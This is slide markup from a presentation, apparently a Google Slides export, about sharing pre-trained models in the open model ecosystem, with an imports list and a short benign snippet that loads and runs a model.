            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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4" name="Shape 304"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p30"/>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306" name="Google Shape;306;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Model Ecosystem Facilitates Model Sharing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307" name="Google Shape;307;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785409" y="2972484"/>
            <a:ext cx="985001" cy="985001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4964510" y="1117031"/>
            <a:ext cx="3408600" cy="1220100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D9D9"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="E0E0F1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="309" name="Google Shape;309;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5051911" y="1028484"/>
            <a:ext cx="3057969" cy="1129096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509106" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="311" name="Google Shape;311;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509106" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Google Shape;312;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8991">
            <a:off x="5105893" y="1986951"/>
            <a:ext cx="344101" cy="903300"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10791009">
            <a:off x="7863409" y="1987810"/>
            <a:ext cx="344101" cy="902700"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209770" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Google Shape;315;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209770" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605975" y="1197500"/>
            <a:ext cx="34086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1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="317" name="Google Shape;317;p30" title="PikPng.com_user-icon-png_398374.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7510100" y="2950112"/>
            <a:ext cx="1029724" cy="1029724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Google Shape;318;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209583" y="2702026"/>
            <a:ext cx="566100" cy="544500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17150">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="319" name="Google Shape;319;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209583" y="2702014"/>
            <a:ext cx="566175" cy="544316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Google Shape;320;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296525" y="1438999"/>
            <a:ext cx="4027500" cy="626100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>The open model ecosystem lets engineers share and reuse pre-trained models.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Google Shape;321;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210282" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="322" name="Google Shape;322;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210282" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>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0" name="Shape 660"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Google Shape;661;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711800" y="3226200"/>
            <a:ext cx="3188100" cy="1166400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>torch.Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.read_weights_from_file</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.SGD</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Google Shape;662;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insight: Libraries Provide Trusted Specifications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Google Shape;663;p57"/>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664" name="Google Shape;664;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394500" y="1332600"/>
            <a:ext cx="3649500" cy="1046700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model.load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.predict(input)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
